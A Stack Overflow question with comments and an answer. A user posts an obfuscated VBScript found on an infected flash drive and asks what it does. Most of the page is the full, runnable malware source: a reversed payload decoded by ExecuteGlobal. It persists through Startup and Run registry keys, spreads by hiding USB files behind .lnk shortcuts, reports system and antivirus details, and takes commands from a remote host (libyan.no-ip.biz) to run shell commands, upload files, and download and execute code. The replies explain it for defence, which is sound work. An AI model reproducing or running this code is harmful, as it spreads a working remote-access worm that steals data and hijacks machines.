The file seems to be a virus.

The real files on the flash drive, along with the script file, are hidden and replaced by .lnk shortcuts that open them and run the script at the same time.

The antivirus raises an alert about a VBS/LNK.JENXCUS.Gen Trojan.

What does the code do? It copies itself into the Startup folder again, even after I delete it.

' Module-level state used by the decoder function that follows.
' zvn accumulates the hidden script text, which is stored back to front.
Dim zvn
' dnqeqvrrc_ receives that text once it has been put back in reading order.
Dim dnqeqvrrc_
' xs is a one-character string holding a double quote; the payload pieces
' splice it in wherever the decoded script needs a quote character.
xs=("""")
' n is a CR/LF pair, spliced in wherever the decoded script needs a line break.
n=(vbcrlf)
Function bnowmx()

zvn=zvn&""&n&"noitcnuf dne"&n&"ynamorflladaer = llehsdmc"&n&"fi dne"&n&""&xs&""&xs&" = ynamorflladaer"&n&" esle"&n&"lladaer.rredts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.rredts.cexeo ton fiesle"&n&"lladaer.tuodts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.tuodts.cexeo ton fi"&n&")dmc & "&xs&" c/ %cepsmoc%"&xs&"( cexe.jbollehs = cexeo tes"&n&"ynamorflladaer,cexeo,jboptth mid"&n&")dmc( llehsdmc noitcnuf"&n&"bus dne"&n&"lru redlofeteled.jbo"
zvn=zvn&"metsyselif"&n&"lru elifeteled.jbometsyselif"&n&"txen emuser rorre no"&n&")lru( fafeteled bus"&n&"bus dne"&n&"eurt,7,dip & "&xs&" DIP/ T/ F/ llikksat"&xs&" nur.jbollehs"&n&"txen emuser rorre no"&n&")dip( ssecorptixe bus"&n&"noitcnuf dne"&n&"txen"&n&"retilps & htapelbatucexe.metijbo & ssecorpmune = ssecorpmune"&n&""&xs&"|"&xs&" & dissecorp.metijbo & ssecorpmune = ssecorpmune    "&n&""&xs&"|"&xs&" & eman.metijbo & ssecorpmune = ssecorpmune   "&n&"smetiloc ni metijbo hcae rof"&n&"metijbo mid"&n&")84,,"&xs&"ssecorp_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&"txen emuser rorre no"&n&")( ssecorpmune noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"retilps & setubirtta.elif & "&xs&"|"&xs&" & "&xs&"f"&xs&" & "&xs&"|"&xs&" &  ezis.elif & "&xs&"|"&xs&" & eman.elif & fafmune = fafmune"&n&"selif.)ridmune( redlofteg.jbometsyselif ni elif hcae  rof"&n&"txen"&n&"retilps & setubirtta.redlof & "&xs&"|"&xs&" & "&xs&"d"&xs&" & "&xs&"|"&xs&" & "&xs&""&xs&" & "&xs&"|"&xs&" & eman.redlof & fafmune = fafmune"&n&"sredlofbus.)ridmune( redlofteg.jbometsyselif ni redlof hcae  rof"&n&"retilps & ridmune = fafmune"&n&")ridmune( fafmune noitcnuf"&n&"noitcnuF dne"&n&"txen"&n&"fi dne"&n&"retilps & epytevird.evird & "&xs&"|"&xs&" & htap.evird & revirdmune = revirdmune"&n&"neht eurt = ydaersi.evird   fi"&n&"sevird.jbometsyselif ni evird hcae  rof"&n&")( revirdmune noitcnuf"&n&"noitcnuf dne"&n&"reffub dnes.jboptth"&n&"eslaf ,lruelif & retilps & "&xs&"gnivcer-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"gni"
zvn=zvn&"hton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc.   "&n&"daer. = reffub     "&n&"lruelif elifmorfdaol.  "&n&"nepo."&n&" 1 = epyt."&n&" edaolpumaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = edaolpumaertsjbo  tes"&n&"reffub,edaolpumaertsjbo,jboptth  mid"&n&")lruelif( daolpu noitcnuf"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts( elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht )otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton =  daolnwodmaertsjbo tes"&n&"htiw dne  "&n&"esolc.         "&n&"otevasrts elifotevas.      "&n&"ydobesnopser.daolnwodptthjbo etirw.        "&n&"nepo.      "&n&" 1 = epyt.         "&n&" daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo  tes    "&n&"daolnwodmaertsjbo  mid"&n&"neht 002 = sutats.daolnwodptthjbo  fi"&n&"fi dne"&n&")otevasrts( elifeteled.daolnwodosfjbo"&n&"neht )otevasrts( stsixeelif.daolnwodosfjbo  fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"( tcejboetaerc = daolnwodosfjbo tes"&n&"     "&n&""&xs&""&xs&" dnes.daolnwodptthjbo"&n&"eslaf ,lruelif & retilps & "&xs&"gnidnes-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.daolnwodptthjbo"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&")1 + )"&xs&"\"&xs&",lruelif( verrtsni ,lruelif( dim & ridelif = otevasrts"&n&"fi dne"&n&"ridllatsni = ridelif"&n&" neht "&xs&""&xs&" = ridelif fi"&n&")ridelif,lruelif( daolnwod bus"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts( elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht )otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc.       "&n&"otevasrts elifote"
zvn=zvn&"vas.       "&n&"ydobesnopser.daolnwodptthjbo etirw.        "&n&"nepo.      "&n&" 1 = epyt.     "&n&"daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo  tes"&n&"daolnwodmaertsjbo  mid"&n&"neht 002 = sutats.daolnwodptthjbo fi"&n&" "&n&"fi dne"&n&")otevasrts( elifeteled.daolnwodosfjbo"&n&"neht )otevasrts( stsixeelif.daolnwodosfjbo  fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"( tcejboetaerc = daolnwodosfjbo tes"&n&"dnes.daolnwodptthjbo"&n&"eslaf ,knilrts ,"&xs&"teg"&xs&" nepo.daolnwodptthjbo"&n&") "&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&"emanelif & ridllatsni = otevasrts"&n&"lruelif = knilrts"&n&")emanelif,lruelif( redaolnwodetis bus"&n&"noitcnuf dne"&n&"tiuq.tpircsw neht 0 > rebmun.rre  fi"&n&")eslaf ,8, emanllatsni & ridllatsni( eliftxetnepo.jbometsyselif = ecnoeno tes"&n&"raelc.rre"&n&"fI dne"&n&" tiuq.tpircsw"&n&")43(rhC & emanllatsni & ridllatsni & )43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&" neht )htaptrohs.trohsemanllufllatsni( esacl >< )htaptrohs.trohsemanlluftpircs( esacl  fi"&n&")emanllatsni & ridllatsni( elifteg.jbometsyselif  = trohsemanllufllatsni tes"&n&")emanlluftpircs.tpircsw( elifteg.jbometsyselif  = trohsemanlluftpircs tes"&n&"tratspu"&n&"fI dne"&n&"fi dne"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu  ,"&xs&"\"&xs&" &  )0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad & "&xs&" - eslaf"&xs&" = gnidaerpsbsu"&n&"esle"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu  ,"&xs&"\"&xs&" &  )0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad"
zvn=zvn&" & "&xs&" - eurt"&xs&" = gnidaerpsbsu"&n&"neht )emanllatsni(esacl  & "&xs&"\:"&xs&" = ))2,emanlluftpircs.tpircsw(dim ( esacl fi"&n&"neht "&xs&""&xs&" = gnidaerpsbsu fi"&n&")"&xs&"\"&xs&" & )0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs = gnidaerpsbsu"&n&"txen emuser rorre no"&n&"ecnatsni noitcnuf"&n&"noitcnuf dne"&n&""&xs&"va-nan"&xs&" =  ytiruces neht "&xs&""&xs&" =  ytiruces fi"&n&"txen"&n&""&xs&". "&xs&" & emanyalpsid.surivitnajbo &  ytiruces =  ytiruces"&n&"surivitnaloc ni surivitnajbo hcae rof"&n&")0,"&xs&"lqw"&xs&","&xs&"tcudorpsurivitna morf * tceles"&xs&"(yreuqcexe.retnecytirucesjbo = surivitnaloc teS"&n&")cs & "&xs&"\toor\tsohlacol\\:stmgmniw"&xs&"(tcejboteg = retnecytirucesjbo tes"&n&""&xs&"retnecytiruces"&xs&" = cs esle "&xs&"2retnecytiruces"&xs&" = cs neht 6 > noisrevso  fi"&n&")noisrevso( lave = noisrevso"&n&"txen"&n&")i( rtsnoisrev  & noisrevso = noisrevso  "&n&")rtsnoisrev( dnuobu ot 1 = x  rof"&n&""&xs&"."&xs&" & )0( rtsnoisrev = noisrevso"&n&")"&xs&"."&xs&",noisrev.smetiloc( tilps = rtsnoisrev"&n&"txen"&n&")"&xs&"."&xs&",noisrev.metijbo( tilps = rtsnoisrev"&n&"smetiloc ni metijbo hcae rof"&n&")84,,"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&""&xs&""&xs&" = ytiruces"&n&"txen emuser rorre no"&n&" ytiruces noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"fi dne"&n&"rof tixe"&n&"rebmunlairesemulov.ksid = diwh"&n&"neht "&xs&""&xs&" >< rebmunlairesemulov.ksid  fi"&n&"sksid ni ksid hcae rof"&n&")"&xs&"ksidlacigol_23niw morf * tceles"&xs&"( yreuqcexe.toor = sksid tes"&n&")"
zvn=zvn&""&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"txen emuser rorre no"&n&"diwh noitcnuf"&n&"bus dne"&n&"eurt, emanllatsni & putrats,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"eurt,emanllatsni & ridllatsni,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&""&xs&"ZS_GER"&xs&" , )43(wrhc & emanllatsni & ridllatsni & )43(wrhc &  "&xs&" B// exe.tpircsw"&xs&"  ,)0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&""&xs&"ZS_GER"&xs&" , )43(wrhc & emanllatsni & ridllatsni & )43(wrhc & "&xs&" B// exe.tpircsw"&xs&"  ,)0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" etirwger.jbollehs"&n&"txeN emuser rorre no"&n&")( tratspu bus"&n&"noitcnuf dne"&n&"fi dne"&n&"fni = noitamrofni"&n&"esle"&n&"  fni = noitamrofni"&n&"gnidaerpsbsu & fni = fni"&n&"retilps & ytiruces & fni = fni"&n&"retilps & "&xs&"sulp"&xs&" & fni = fni"&n&"txen"&n&"rof tixe"&n&"  retilps & noitpac.ofniso & fni = fni"&n&"so ni ofniso hcae rof"&n&")"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"( yreuqcexe.toor = so tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"retilps & )"&xs&"%emanresu%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs &  fni = fni"&n&" retilps & )"&xs&"%emanretupmoc%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs &  fni = fni"&n&" retilps & diwh = fni"&n&"neht "&xs&""&xs&" = fni  fi"&n&"txen emuser rorre no"&n&"noitamrofni noitcnuf"&n&"noitcnuf dne"&n&"txetesnopser.jboptth ="
zvn=zvn&" tsop"&n&"marap dnes.jboptth"&n&"noitamrofni,"&xs&":tnega-resu"&xs&" redaehtseuqertes.jboptth"&n&"eslaf ,dmc & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&"marap = tsop"&n&")marap, dmc( tsop noitcnuf"&n&"bus dne"&n&"tiuq.tpircsw"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&"txen"&n&"0 = setubirtta.redlof"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&" )htap.elif( elifeteled.jbometsyselif"&n&"esle"&n&"fI dne"&n&")eman.elif & "&xs&"\"&xs&" & htap.evird( elifeteled.jbometsyselif"&n&"esle"&n&") "&xs&"knl."&xs&" & )0(emanelif & "&xs&"\"&xs&" & htap.evird( elifeteled.jbometsyselif"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht )emanllatsni( esacu >< )eman.elif( esacu  fi"&n&"0 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" >< ))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps( esacl  fi"&n&"neht )"&xs&"."&xs&",eman.elif( rtsni  fi"&n&"txen emuser rorre no"&n&"selif.)"&xs&"\"&xs&" & htap.evird ( redlofteg.jbometsyselif ni elif hcae  rof"&n&"neht 1 =  epytevird.evird  fi"&n&"neht 0 >  ecapseerf.evird  fi"&n&"neht eurt = ydaersi.evird  fi"&n&"sevird.jbometsyselif ni evird hcae  rof"&n&"eurt, emanlluftpircs.tpircsw elifeteled.jbometsyselif"&n&"eurt, emanllatsni & putrats elifeteled.jbometsyselif"&n&")0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" eteledger.jbollehs"&n&")0()"&xs&"."&xs&",emanllatsni( tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" eteledger.jbollehs"&n&"emanredlof mid"&n&"emanelif mid"&n&"txen e"
zvn=zvn&"muser rorre no"&n&"llatsninu bus"&n&"bus dne"&n&"raelc.rre"&n&"txen"&n&"fi dne"&n&"fI dne"&n&"fI dne"&n&"txen"&n&")(evas.jboknl"&n&"fi dne"&n&"nociredlof = noitacolnoci.jboknl"&n&" esle"&n&"htap.redlof = noitacolnoci.jboknl"&n&"neht 0 = )"&xs&","&xs&",nociredlof( rtsni  fi"&n&" )"&xs&"\nocitluafed\redlof\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs = nociredlof"&n&""&xs&"tixe&"&xs&"& ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",eman.redlof(ecalper & "&xs&" rerolpxe trats&"&xs&" & ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"exe.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&" )"&xs&"knl."&xs&" & emanredlof &  "&xs&"\"&xs&" & htap.evird( tuctrohsetaerc.jbollehs = jboknl tes"&n&"eman.redlof = emanredlof"&n&"4+2 = setubirtta.redlof"&n&"rof tixe neht redlofknl ton fi"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&")(evas.jboknl"&n&"fi dne"&n&"nocielif = noitacolnoci.jboknl"&n&" esle"&n&"htap.elif = noitacolnoci.jboknl"&n&"neht 0 = )"&xs&","&xs&",nocielif( rtsni  fi"&n&" )"&xs&"\nocitluafed\"&xs&" & )"&xs&"\"&xs&" &)))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps & "&xs&".\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs & "&xs&"\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"( daerger.jbollehs = nocielif"&n&""&xs&"tixe&"&xs&"& ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",eman.elif(ecalper & "&xs&" trats&"&xs&" & ))43(wrhc & "&xs&" "&xs&" & )43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"ex"
zvn=zvn&"e.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&" )"&xs&"knl."&xs&" & )0( emanelif &  "&xs&"\"&xs&" & htap.evird( tuctrohsetaerc.jbollehs = jboknl tes"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht )emanllatsni( esacu >< )eman.elif( esacu  fi"&n&"4+2 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" >< ))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu( )"&xs&"."&xs&" ,eman.elif(tilps( esacl  fi"&n&"neht )"&xs&"."&xs&",eman.elif( rtsni  fi"&n&"rof tixe neht elifknl ton fi"&n&"seliF.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni elif hcae rof"&n&"fi dne"&n&"4+2 = setubirtta.)emanllatsni &  "&xs&"\"&xs&" & htap.evird(elifteg.jbometsyselif"&n&"neht  )emanllatsni & "&xs&"\"&xs&" & htap.evird( stsixeelif.jbometsyselif  fi"&n&"eurt,emanllatsni & "&xs&"\"&xs&" & htap.evird , emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"neht 1 =  epytevird.evird  fi"&n&"neht 0 >  ecapseerf.evird  fi"&n&"neht eurt = ydaersi.evird  fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&"tratspu"&n&"nociredlof mid"&n&"nocielif mid"&n&"emanredlof mid"&n&"emanelif mid"&n&"jboknl mid"&n&"txen emuser rorre no"&n&"llatsni bus"&n&"dnew"&n&"peels peels.tpircsw"&n&"tceles dne"&n&"        )marap( lave = peels"&n&")1( dmc = marap"&n&""&xs&"peels"&xs&"  esac"&n&" )marap( ssecorptixe"&n&")1( dmc = marap"&n&""&xs&"ssecorp-tixe"&xs&"  esac"&n&" )marap( fafeteled"&n&")1( dmc = marap"&n&""&xs&"eteled"&xs&"  esac"&n&"  )marap( llehsdmc,"&xs&"llehs-dmc-si"&xs&" tsop"&n&")1( dmc = marap"&n&""&xs&"llehs-dmc"&xs&"  esac"&n&"   ssecorpmune,"&xs&"ssecorp-mune-si"&xs&" tsop"&n&""&xs&"ssecorp-mune"&xs&"  esac"&n&")marap( fafmune,"&xs&"faf-mune-si"&xs&" tsop"&n&")1( dmc = marap"&n&""&xs&"faf-mune"&xs&"  esac"&n&"  revirdmune,"&xs&"revir"
zvn=zvn&"d-mune-si"&xs&" tsop"&n&""&xs&"revird-mune"&xs&"  esac"&n&")marap( daolpu"&n&")1( dmc = marap"&n&""&xs&"vcer"&xs&" esac"&n&")2( dmc,)1( dmc redaolnwodetis"&n&""&xs&"dnes-etis"&xs&" esac"&n&")2( dmc,)1( dmc daolnwod"&n&""&xs&"dnes"&xs&" esac"&n&"llatsninu"&n&""&xs&"llatsninu"&xs&" esac"&n&" tiuq.tpircsw"&n&")43(rhc & emanllatsni & ridllatsni & )43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&"esolc.ecnoeno"&n&"marap etirw.ecnoeno"&n&")eslaf ,2, emanllatsni & ridllatsni( eliftxetnepo.jbometsyselif  = ecnoeno tes"&n&"esolc.ecnoeno"&n&")1( dmc = marap"&n&""&xs&"etadpu"&xs&" esac"&n&"marap etucexe"&n&")1( dmc = marap"&n&""&xs&"etucecxe"&xs&" esac"&n&")0( dmc esac tceles"&n&")retilps,esnopser( tilps = dmc"&n&")"&xs&""&xs&","&xs&"ydaer-si"&xs&"( tsop = esnopser"&n&""&xs&""&xs&" = esnopser"&n&"llatsni"&n&"eurt elihw"&n&"ecnatsni"&n&"txen emuser rorre no"&n&"ecnoeno mid"&n&""&xs&""&xs&" = etadtrats"&n&""&xs&""&xs&" = gnidaerpsbsu"&n&""&xs&""&xs&" = ofni"&n&"marap mid"&n&"dmc mid"&n&"esnopser mid"&n&" 0005 = peels"&n&""&xs&">"&xs&" & "&xs&"|"&xs&" & "&xs&"<"&xs&" = retilps"&n&""&xs&"\"&xs&" & )"&xs&"%pmet%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni  neht )ridllatsni(stsixeredlof.jbometsyselif ton fi"&n&""&xs&"\"&xs&" & )ridllatsni(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni"&n&""&xs&"\"&xs&" & )"&xs&"putrats"&xs&"( sredloflaiceps.jbollehs = putrats"&n&"emantpircs.tpircsw = emanllatsni"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"jboptth mid"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = jbometsyselif tes"&n&"jbometsyselif mid"&n&")"&xs&"llehs.tpircsw"&xs&"(tcejboetaerc.tpircsw = jbollehs tes"&n&" jbollehs mid"&n&"eurt = redlofknl"&n&"eurt = elifknl"&n&""&xs&"%pmet%"&xs&" = ridllatsni"&n&"7711 = trop"&n&""&xs&"zib.pi-on.naybil"&xs&" = tsoh"&n&"reDoCXdaME'"

' Decoding step of bnowmx. The statements before this point only concatenate
' reversed text into zvn. This loop walks zvn from its last character to its
' first and appends each character to dnqeqvrrc_, which yields the hidden
' script in normal reading order.
for azcujbz=(((len)(zvn)))to(1)Step(-1)
' Take the single character at the current position.
ypqmwkll=(mid(zvn,azcujbz,1))
' NOTE(review): szauuy_l_vr is never assigned anywhere in the visible code, so
' it presumably contributes an empty string and is only filler. Confirm that
' no earlier assignment or Option Explicit exists.
dnqeqvrrc_=(dnqeqvrrc_&ypqmwkll&szauuy_l_vr)
next
' Return the decoded script text to the caller.
bnowmx=dnqeqvrrc_
End Function 
' Runs the string returned by bnowmx() as VBScript in the global scope, so
' everything the decoded text defines and does takes effect from this call.
' NOTE(review): when analysing a sample like this, do not let this line run.
' On an isolated analysis machine, replace the ExecuteGlobal call with an
' output call (for example WScript.Echo, or writing the string to a file) so
' the decoded script can be read without being executed.
Executeglobal(cstr(bnowmx()))
' The same tag, reversed, also ends the payload text built inside bnowmx, so
' it presumably marks the obfuscation tool or its author. It can serve as a
' static indicator when searching for related samples.
'EMadXCoDer,www.dev-point.com
TessellatingHeckler
Ahmed
    I'm voting to close this question as off-topic because it is not a question about a programming issue. – Smandoli Oct 27 '15 at 20:38
    Likely something malicious. Not necessarily though. It's just heavily obfuscated. Agreed, off-topic though. – CollinD Oct 27 '15 at 20:40
    It makes a string and then reverses it and then executes the reversed string. You could just replace the executeglobal with a message box to see the code that is about to be executed. But that's not the problem! The problem is that it is too late. If it keeps recreating itself when you delete it then your system is already infected. – Jerry Jeremiah Oct 27 '15 at 20:45
    It's not very heavily obfuscated, it's mostly backwards - paste it into http://string-functions.com/reverse.aspx or similar and it's VBScript code involving reading disks and folders and free space, checking OS version, querying for installed antivirus, connecting to a server on a free-DNS service and downloading something and saving it, writing things to the registry... – TessellatingHeckler Oct 27 '15 at 20:47
  • Thank you for your responses. Where should I have posted this question: on http://security.stackexchange.com/? – Ahmed Oct 27 '15 at 21:01

1 Answer

The code installs itself in the user's Startup folder and then sets both Run registry keys (under HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE) to execute the script when the machine boots. When run, the script starts a loop that executes forever. Each time through the loop it reinstalls itself, which is why deleting the copy has no lasting effect while the script is still running, and then makes an HTTP request to libyan.no-ip.biz and asks for instructions. The response instruction can be many things, including having the script send information that is on the drive or download and execute arbitrary code.

Jerry Jeremiah